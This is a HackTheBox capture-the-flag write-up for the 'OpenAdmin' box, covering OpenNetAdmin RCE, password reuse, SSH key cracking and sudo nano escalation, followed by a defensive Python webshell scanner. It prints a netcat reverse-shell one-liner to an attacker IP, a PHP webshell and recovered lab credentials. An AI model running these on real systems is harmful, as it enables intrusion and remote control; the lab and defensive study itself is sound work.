
OpenAdmin — HackTheBox (write-up)

Difficulty: Easy
Box: OpenAdmin (HackTheBox)
Author: dsec
Date: 2025-01-12


TL;DR

OpenNetAdmin (ONA) RCE led to a shell as www-data. Found database password reused for SSH as jimmy. Internal-only website on port 52846 revealed Joanna's encrypted SSH key. Cracked the key passphrase and SSH'd as joanna. Sudo nano GTFOBins for root.


Target info

  • Host: 10.129.90.175
  • Services discovered via nmap

Enumeration

[Screenshot: Nmap results]

Found /ona (OpenNetAdmin):

[Screenshot: ONA interface]

[Screenshot: ONA version]


Foothold

[Screenshot: RCE exploit]

Initial shell couldn't cd, so upgraded:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.142 4444 >/tmp/f

[Screenshot: Upgraded shell]

Found port 52846 running internally:

[Screenshot: Internal port]

/var/www/internal directory:

[Screenshot: Internal web root]


Lateral movement (www-data to jimmy)

Searched for credential references:

find /etc /var/log -type f -exec grep -i "joanna" {} + 2>/dev/null
grep -ril "joanna" /etc /var/log 2>/dev/null

[Screenshot: grep results]

Joanna has a sudo file; jimmy does not.

find /etc /var/log -type f -exec grep -i "password" {} + 2>/dev/null

[Screenshot: Password search]

[Screenshot: ONA database config]

Found password: xxj31ZMTZzkVA -- didn't work anywhere directly.

[Screenshot: Database password]

Found n1nj4W4rri0R! in ONA config.

SSH as jimmy

ssh jimmy@10.129.90.175
# password: n1nj4W4rri0R!

[Screenshot: Jimmy shell]


Lateral movement (jimmy to joanna)

Listed directories owned by jimmy:

find / -type d -user jimmy 2>/dev/null

[Screenshot: Jimmy's directories]

find / -type d -user jimmy 2>/dev/null | xargs -I {} ls -ld {}

[Screenshot: Directory permissions]

In /var/www/internal, found main.php:

[Screenshot: main.php]

And index.php with a password hash:

[Screenshot: index.php hash]

Hash: 00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1

[Screenshot: Hash cracked]

The hash cracked to "Revealed". Logged into the internal site:

[Screenshot: Internal login]

Got an encrypted SSH key. Saved as rsa_key.

Created a targeted wordlist and cracked:

grep -i ninja /usr/share/wordlists/rockyou.txt > rockyou_ninja
ssh2john rsa_key > hash.txt
john --wordlist=rockyou_ninja hash.txt

[Screenshot: Key cracked]

Passphrase: bloodninjas

ssh -i rsa_key joanna@10.129.90.175

Alternate path: Could also drop a PHP webshell in /var/www/internal since jimmy owns it:

echo '<?php system($_GET["dank"]); ?>' > dank.php

[Screenshot: Webshell]

[Screenshot: Command execution]

Then trigger a reverse shell via the webshell:

[Screenshot: Reverse shell as joanna]

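As an added defensive check (not part of this write-up), a small Python scanner that flags the direct superglobal-to-shell webshell pattern shown above and reports web-root directories owned by a non-root user, the condition that let jimmy drop a file into /var/www/internal; the WEBROOT environment variable is an assumption for the demo:

```python
import os
import re
import stat

# Command-execution sinks called directly on request input, e.g. the
# one-liner webshell from the alternate path above.
SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
WEBSHELL_RE = re.compile(SINKS + r"\s*\(\s*" + REQUEST_INPUT)
PHP_FILE_RE = re.compile(r"\.(?:php\d?|phtml)$", re.IGNORECASE)


def scan_php_source(src):
    """True if a shell sink is fed straight from a request superglobal.
    Indirect flows (input assigned to a variable first) are not caught."""
    return WEBSHELL_RE.search(src) is not None


def scan_webroot(root, trusted_uids=(0,)):
    """Walk a web root and return (path, reason) findings: PHP files that
    match the webshell pattern, and directories owned by a uid outside
    trusted_uids or world-writable (a foothold as that user can drop new
    PHP files there, as jimmy could in /var/www/internal)."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        st = os.stat(dirpath)
        if st.st_uid not in trusted_uids:
            findings.append((dirpath, f"directory owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((dirpath, "directory is world-writable"))
        for name in filenames:
            if not PHP_FILE_RE.search(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            if scan_php_source(src):
                findings.append((path, "request input passed to a shell sink"))
    return findings


if __name__ == "__main__":
    # WEBROOT is an assumed environment variable for this demo.
    for path, reason in scan_webroot(os.environ.get("WEBROOT", "/var/www")):
        print(f"{path}: {reason}")
```

Running it from cron against the web root, with a trusted uid list that matches the deployment user, turns the ownership lesson from this box into a recurring audit.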

Privesc

sudo -l

From GTFOBins for nano:

[Screenshot: nano GTFOBins]

[Screenshot: Root shell]


Lessons & takeaways

  • Search the entire filesystem for files containing usernames or "password" to find config files with reused creds
  • Internal-only web apps (localhost-bound ports) often contain credentials or SSH keys
  • Use grep to create a sub-wordlist from rockyou when you have a hint about the password pattern
  • find / -type d -user <username> reveals what directories a user owns, highlighting writable locations